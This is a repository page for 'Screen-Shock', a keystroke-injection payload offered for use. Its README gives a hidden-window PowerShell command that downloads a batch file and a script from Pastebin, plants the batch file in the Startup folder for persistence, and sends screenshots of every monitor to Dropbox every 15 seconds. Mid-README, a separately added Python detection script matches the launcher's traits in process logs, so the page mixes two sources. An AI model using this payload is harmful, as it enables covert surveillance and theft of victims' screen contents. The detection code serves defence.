omg-payloads/payloads/library/exfiltration/Screen-Shock
atomic a3f3739810
Update c.ps1
2022-09-07 22:41:27 -04:00
I.bat Add files via upload 2022-09-07 19:56:13 -04:00
README.md Add files via upload 2022-09-07 19:56:13 -04:00
c.ps1 Update c.ps1 2022-09-07 22:41:27 -04:00
payload.txt Add files via upload 2022-09-07 19:56:13 -04:00
placeholder Add files via upload 2022-09-07 19:56:13 -04:00

README.md

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments

Screen-Shock

This payload exfiltrates screenshots of all monitors and sends them to a Dropbox every 15 seconds. (This setting can be changed in the c.ps1 file.)

Description

This payload uses iwr to download 2 files

  • I.bat
  • c.ps1

I.bat is downloaded to the Startup folder to maintain persistence and execute c.ps1 on reboot/startup.

c.ps1 sits in the AppData\Roaming folder and takes a screenshot of all monitors every 15 seconds.

The screenshots are then sent to the Dropbox for viewing pleasure.

Getting Started

Dependencies

  • Pastebin or other file sharing service, Dropbox
  • Windows 10
  • Here is a tutorial on how to use DropBox-Upload


Executing program

  • Plug in your device
  • The device will download both files, place them in the proper directories, and then run the script
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
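
For detection, the traits of the launcher line above can be matched in process-creation logs (for example Sysmon Event ID 1 or Security 4688 with command-line logging). This is an added example, not code from the original repository; the event layout (`id`, `CommandLine`), the indicator names and the flagging rule are assumptions, and the sample events are constructed.

```python
import re

def abbrev(name, min_len=1):
    """Alternation of every prefix of `name` with at least `min_len` characters;
    powershell.exe accepts abbreviated parameter names such as -w and -NoP."""
    return "(?:" + "|".join(name[:i] for i in range(len(name), min_len - 1, -1)) + ")"

PARAM = r"(?<!\S)-"        # a parameter begins a new token
VALUE = r"""\s+["']?"""    # whitespace, then an optionally quoted value
# Traits of the launcher line in this README. Each one is weak evidence alone.
PATTERNS = {name: re.compile(rx, re.I) for name, rx in {
    "hidden_window": PARAM + abbrev("windowstyle") + VALUE + abbrev("hidden") + r"\b",
    "policy_bypass": PARAM + "(?:ep|" + abbrev("executionpolicy", 2) + ")" + VALUE + r"bypass\b",
    "web_download": r"\b(?:iwr|invoke-webrequest)\b",
    "startup_write": r'\\Start Menu\\Programs\\Startup\\[^\\"]+\.(?:bat|cmd|ps1|vbs)\b',
    "appdata_root_ps1": r'(?:\$env:APPDATA|%APPDATA%|\\AppData\\Roaming)\\[^\\"\s]+\.ps1\b',
}.items()}

def indicators(cmdline):
    """Names of the traits present in one process command line."""
    return sorted(name for name, rx in PATTERNS.items() if rx.search(cmdline))

def is_suspicious(hits):
    # Assumed rule: a download combined with a Startup-folder write is the
    # persistence step itself; otherwise require three weak traits together.
    return {"web_download", "startup_write"} <= set(hits) or len(hits) >= 3

def triage(events):
    """Return (event id, traits) for every event the rule flags."""
    flagged = []
    for ev in events:
        hits = indicators(ev["CommandLine"])
        if is_suspicious(hits):
            flagged.append((ev["id"], hits))
    return flagged

# Constructed sample events; the first is the README's launcher with its placeholders.
SAMPLE_EVENTS = [
    {"id": 1, "CommandLine": r'powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""'},
    {"id": 2, "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"id": 3, "CommandLine": r'powershell -NoProfile -Command "Invoke-WebRequest https://example.com/tool.zip -OutFile C:\Temp\tool.zip"'},
    {"id": 4, "CommandLine": r"powershell -w hidden -ep bypass C:\Users\alice\AppData\Roaming\c.ps1"},
]

if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_EVENTS):
        print(event_id, hits)
```

Events 2 and 3 each show a single trait and are not flagged, which is why the rule requires traits in combination rather than alerting on any one of them.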


Contributing

All contributors' names will be listed here:

atomiczsec


Version History

  • 0.1
    • Initial Release


Contact

📱 My Socials 📱

YouTube
Twitter
I-Am-Jakoby's Discord

Acknowledgments
